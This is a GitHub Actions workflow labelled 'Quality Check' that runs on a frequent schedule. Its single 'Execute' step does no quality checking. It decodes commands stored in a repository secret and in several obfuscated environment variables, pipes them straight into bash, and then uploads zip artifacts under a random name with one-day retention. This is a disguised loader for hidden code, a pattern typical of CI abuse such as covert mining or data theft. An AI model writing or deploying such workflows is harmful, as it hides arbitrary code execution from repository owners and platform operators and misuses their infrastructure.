name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '37 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  task:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Execute
        env:
          c87: ${{ secrets.c87 }}
        run: |
          printf '%s' "$c87" | jq -r .ua991 | /bin/bash
          echo $hygx7013 | jq -r .x7 | /bin/bash
          printf '%s' "$qnka2722" | jq -r .gv65910 | /bin/bash
          echo $pthwt4507 | jq -r .mg265 | /bin/bash
          printf '%s' "$p0114" | jq -r .iqwan7 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: JZdkBfCl
          path: "*.zip"
          retention-days: 1
